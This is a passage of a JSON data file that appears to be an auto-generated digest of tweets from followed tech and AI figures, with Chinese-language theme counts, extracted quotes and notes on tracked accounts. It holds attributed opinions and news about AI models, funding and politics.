production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://x.com/HarryStebbings/status/2047316267858645088", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://x.com/soumithchintala/status/2047191747793649805", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047145172337836139", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://x.com/DavidSacks/status/2047104229773279572", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://x.com/DavidSacks/status/2047103978979119580", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://x.com/CryptoCred/status/2047079463750377958", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://x.com/eladgil/status/2047052737762980083", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://x.com/AravSrinivas/status/2047019688920756504", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://x.com/AravSrinivas/status/2047016400292839808", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://x.com/morganhousel/status/2047013991046881663", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://x.com/naval/status/2046991137022648800", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://x.com/liuliu/status/2046986486629986435", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://x.com/karpathy/status/2046982383430496444", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://x.com/naval/status/2046961436593713241", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://x.com/HarryStebbings/status/2046938853445959738", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://x.com/eladgil/status/2046722094348771758", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://x.com/eladgil/status/2046695194054320150", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://x.com/HarryStebbings/status/2046684883494600911", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://x.com/eladgil/status/2046674350993223784", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://x.com/JeffDean/status/2046673188193701901", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://x.com/eladgil/status/2046640542218604783", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.", + "url": "https://x.com/AravSrinivas/status/2046638770162995603", + "published_at": "2026-04-21T17:14:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://x.com/JeffDean/status/2046635685206208533", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://x.com/JeffDean/status/2046632664493384060", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://x.com/DavidSacks/status/2046632586735243420", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://x.com/HarryStebbings/status/2046614183513604299", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "⌘ ⌘", + "url": "https://x.com/AravSrinivas/status/2046606492649091212", + "published_at": "2026-04-21T15:06:26+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "RT by @morganhousel: I’m in love with this sentence:\n\n“The best math you can learn is how to calculate the future cost of current decisions.”", + "url": "https://x.com/morganhousel/status/2046429717834654025", + "published_at": "2026-04-21T03:24:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Whoa 🤯", + "url": "https://x.com/AravSrinivas/status/2046419556424675677", + "published_at": "2026-04-21T02:43:37+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2046375878368940239", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "", + "url": "https://x.com/AravSrinivas/status/2046347469488107839", + "published_at": "2026-04-20T21:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://x.com/JeffDean/status/2046344875994739028", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://x.com/svwang1/status/2046343776378257515", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://x.com/svwang1/status/2046336504407142606", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://x.com/eladgil/status/2046300649483374704", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://x.com/eladgil/status/2046284381439103043", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://x.com/eladgil/status/2046284194943500453", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://x.com/eladgil/status/2046284191885922498", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://x.com/eladgil/status/2046284190132609299", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://x.com/eladgil/status/2046284188622737554", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://x.com/eladgil/status/2046284184877187540", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://x.com/soumithchintala/status/2046282944139215141", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 170 + }, + { + "title": "模型能力", + "count": 53 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "投融资与并购", + "count": 13 + }, + { + "title": "算力与芯片", + "count": 8 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "其他", + "subtitle": "近30天样本 182 条", + "bullets": [ + "其他相关讨论热度位居前列。" + ] + }, + { + "id": "t2", + "title": "模型能力", + "subtitle": "近30天样本 43 条", + "bullets": [ + "模型能力相关讨论热度位居前列。" + ] + }, + { + "id": "t3", + "title": "交易与市场", + "subtitle": "近30天样本 17 条", + "bullets": [ + "交易与市场相关讨论热度位居前列。" + ] + } + ], + "p0_events": [ + { + "id": "p1", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much w", + "meta": "@elonmusk | 2026-04-27T16:54:21+00:00", + "summary": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "url": "https://x.com//status/2048807976991850953" + }, + { + "id": "p2", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI", + "meta": "@elonmusk | 2026-04-27T16:39:59+00:00", + "summary": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major rep", + "url": "https://x.com//status/2048804363595059425" + }, + { + "id": "p3", + "title": "Exactly", + "meta": "@elonmusk | 2026-04-27T16:31:33+00:00", + "summary": "Exactly", + "url": "https://x.com//status/2048802239272169582" + }, + { + "id": "p4", + "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full ", + "meta": "@elonmusk | 2026-04-27T16:30:27+00:00", + "summary": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the acti", + "url": "https://x.com//status/2048801964457140540" + }, + { + "id": "p5", + "title": "Scam Altman", + "meta": "@elonmusk | 2026-04-27T16:21:30+00:00", + "summary": "Scam Altman", + "url": "https://x.com//status/2048799712375902624" + }, + { + "id": "p6", + "title": "Americans spent over $109 billion on lottery tickets last ye", + "meta": "@charliebilello | 2026-04-27T16:21:01+00:00", + "summary": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com//status/2048799590044852390" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "speaker": "@elonmusk", + "date": "2026-04-27T16:54:21+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048807976991850953" + }, + { + "id": "q2", + "quote": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerfu", + "speaker": "@elonmusk", + "date": "2026-04-27T16:39:59+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048804363595059425" + }, + { + "id": "q3", + "quote": "Exactly", + "speaker": "@elonmusk", + "date": "2026-04-27T16:31:33+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048802239272169582" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "@GaryMarcus", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c2", + "title": "@sama", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c3", + "title": "@paulg", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c4", + "title": "@pmarca", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "已启用规则兜底", + "detail": "本次 LLM 结构化输出为空,已切换到规则归纳结果。" + }, + { + "id": "llm-fallback-error", + "level": "MID", + "title": "LLM 编排暂不可用", + "detail": "本次使用规则兜底:Expecting ',' delimiter: line 1 column 6191 (char 6190)" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T17:01:00.335819+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(1 条)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://x.com/karpathy/status/2046982383430496444)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://x.com/sama/status/2048755148361707946)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://x.com/sama/status/2048751392031203544)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://x.com/sama/status/2048554097985593849)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://x.com/sama/status/2048552677433643427)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://x.com/sama/status/2048428561481265539)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://x.com/sama/status/2048426122854228141)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://x.com/sama/status/2048224374264885396)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://x.com/sama/status/2048165186482389253)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://x.com/sama/status/2048160448340767038)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://x.com/sama/status/2048160404376105179)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://x.com/sama/status/2048062261584077149)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://x.com/sama/status/2047823357635354814)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://x.com/sama/status/2047787124846653895)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://x.com/sama/status/2047683787828703289)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://x.com/sama/status/2047473914528563592)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://x.com/sama/status/2047403771416940715)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://x.com/sama/status/2047395562501411058)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://x.com/sama/status/2047392357482639749)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://x.com/sama/status/2047386955550470245)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://x.com/sama/status/2047381565534322694)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(10 条)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047145172337836139)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://x.com/AravSrinivas/status/2047019688920756504)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://x.com/AravSrinivas/status/2047016400292839808)\n\n**[2026-04-21T17:14:42+00:00]**\n> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.\n[原文链接](https://x.com/AravSrinivas/status/2046638770162995603)\n\n**[2026-04-21T15:06:26+00:00]**\n> ⌘ ⌘\n[原文链接](https://x.com/AravSrinivas/status/2046606492649091212)\n\n**[2026-04-21T02:43:37+00:00]**\n> RT by @AravSrinivas: Whoa 🤯\n[原文链接](https://x.com/AravSrinivas/status/2046419556424675677)\n\n**[2026-04-20T21:57:10+00:00]**\n> \n[原文链接](https://x.com/AravSrinivas/status/2046347469488107839)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years 